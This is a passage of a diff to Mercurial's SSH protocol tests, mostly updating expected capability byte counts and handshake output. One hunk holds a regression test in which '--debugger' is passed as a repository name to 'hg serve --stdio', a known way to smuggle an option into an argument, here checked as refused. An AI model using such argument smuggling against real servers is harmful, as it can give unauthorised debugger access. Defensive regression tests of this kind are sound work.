$USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1715,8 +1722,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1788,8 +1795,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1843,8 +1850,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command @@ -1918,8 +1925,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1977,8 +1984,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending unbundle command diff --git a/tests/test-ssh-proto.t b/tests/test-ssh-proto.t --- a/tests/test-ssh-proto.t +++ b/tests/test-ssh-proto.t @@ -1,5 +1,12 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] @@ -64,7 +71,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -86,8 +93,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n `hg debugserve --sshstdio` works @@ -96,7 +103,7 @@ $ hg debugserve --sshstdio << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash I/O logging works @@ -106,24 +113,24 @@ > EOF e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> flush() -> None $ hg debugserve --sshstdio --logiofile $TESTTMP/io << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash $ cat $TESTTMP/io e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> flush() -> None @@ -149,8 +156,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -187,7 +194,7 @@ remote: banner: line 7 remote: banner: line 8 remote: banner: line 9 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -245,8 +252,8 @@ o> readline() -> 15: o> banner: line 9\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -297,12 +304,12 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n + o> 444\n i> write(98) -> 98: i> between\n i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 - o> readline() -> 463: + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -316,7 +323,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -365,8 +372,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -390,7 +397,7 @@ remote: 0 remote: 0 remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -447,8 +454,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -494,8 +501,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -539,8 +546,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -609,8 +616,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Incomplete dictionary send @@ -691,8 +698,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -725,8 +732,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -768,8 +775,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -797,8 +804,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(105) -> 105: i> between\n @@ -838,8 +845,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -887,8 +894,8 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -914,7 +921,7 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n + o> 444\n Send an upgrade request to a server that doesn't support that command @@ -943,8 +950,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -962,7 +969,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -1005,8 +1012,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n $ cd .. @@ -1081,7 +1088,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -1114,14 +1120,14 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 447\n - o> readline() -> 447: + o> 428\n + o> readline() -> 428: o> capabilities: branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Multiple upgrades is not allowed @@ -1152,8 +1158,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(45) -> 45: i> upgrade another-token proto=irrelevant\n @@ -1224,8 +1230,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -1343,8 +1349,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1381,8 +1387,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1431,8 +1437,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1461,8 +1467,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1492,8 +1498,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1525,8 +1531,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1559,8 +1565,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1595,8 +1601,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1634,8 +1640,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1674,8 +1680,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -1726,8 +1732,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1759,8 +1765,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1809,8 +1815,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1847,8 +1853,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1886,8 +1892,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1922,8 +1928,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1959,8 +1965,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1992,8 +1998,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -2030,8 +2036,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2071,8 +2077,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -2137,8 +2143,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2177,8 +2183,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending batch with 3 sub-commands diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -64,8 +64,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 8 files to transfer, 827 bytes of data - transferred 827 bytes in * seconds (*) (glob) + 8 files to transfer, 827 bytes of data (no-zstd !) + transferred 827 bytes in * seconds (*) (glob) (no-zstd !) + 8 files to transfer, 846 bytes of data (zstd !) + transferred * bytes in * seconds (* */sec) (glob) (zstd !) updating to branch default 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd local-stream @@ -390,6 +392,7 @@ abort: destination 'a repo' is not empty [10] +#if no-rhg Make sure hg is really paranoid in serve --stdio mode. It used to be possible to get a debugger REPL by specifying a repo named --debugger. $ hg -R --debugger serve --stdio @@ -402,6 +405,27 @@ $ hg -R narf serv --stdio abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] [255] +#else +rhg aborts early on -R without a repository at that path + $ hg -R 